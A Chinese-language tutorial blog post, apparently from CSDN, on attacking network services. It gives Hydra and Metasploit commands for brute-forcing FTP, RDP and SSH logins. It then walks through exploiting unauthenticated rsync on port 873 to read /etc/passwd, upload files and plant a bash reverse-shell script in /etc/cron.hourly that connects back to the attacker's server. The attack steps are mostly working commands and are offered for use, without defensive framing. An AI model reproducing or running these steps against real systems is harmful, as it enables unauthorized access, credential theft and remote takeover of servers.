服务漏洞&FTP&RDP&SSH&rsync

本文介绍了针对网络服务的安全测试,包括使用Hydra和Metasploit(MSF)进行FTP、RDP和SSH的密码爆破。通过端口扫描如3389、21、22、445等,利用Hydra和MSF进行登录凭证暴力破解,并演示了RSYNC未授权访问漏洞的利用方法,涉及文件读取、下载、上传及反弹shell等操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

服务漏洞

FTP

针对服务的密码爆破工具

有九头蛇和美少妇工具

Hydra和MSF

我个人还是比较喜欢用MSF

但是两个工具都要去了解

那么前期必须是端口扫描了

那么具体扫描哪些端口呢可以针对的去扫描3389.21.22.445等登录性的端口

Hydra

hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

MSF

首先打开MSF

搜索

search ftp_login

在这里插入图片描述

然后调用到搜索出来的这个模块

msf6 > use 0

在这里插入图片描述

然后查看里面需要配置的内容

show options

在这里插入图片描述

字典路径就自己搞了

在这里插入图片描述

配置完成

检查一下啊

看看有没有配置错误的

show options

检查没有问题后

就可以执行run执行了

在这里插入图片描述

然后远程登录上去

在这里插入图片描述

RDP 3389

hydra ip rdp -L users.txt -P pass.txt -V

在这里插入图片描述

SSH

这个的话,我还要比较喜欢用MSF 中的SSH_login

search ssh_Login

在这里插入图片描述

配置信息都是和FTP差不多导入账户和密码字典,指定目标ip

rsync未授权访问漏洞利用(端口873)

判断:rsync rsync://xxx:873/

利用:

-读取文件:rsync rsync://xxx:873/src/

-下载文件:rsync rsync://xxx:873/src/etc/passwd ./

-上传文件:rsync -av passwd rsync://xxx:873/src/tmp/passwd

反弹shell:

1、获取信息:

rsync rsync://xxx:873/src/etc/crontab /root/cron.txt

2.创建文件 

touch shell 

\#!/bin/bash 

/bin/bash -i >& /dev/tcp/反弹到你服务器ip/5566 0>&1

chmod +x shell		

3、上传文件 

rsync -av shell rsync://xxx:873/src/etc/cron.hourly 

4、等待接受反弹
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无聊的知识

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值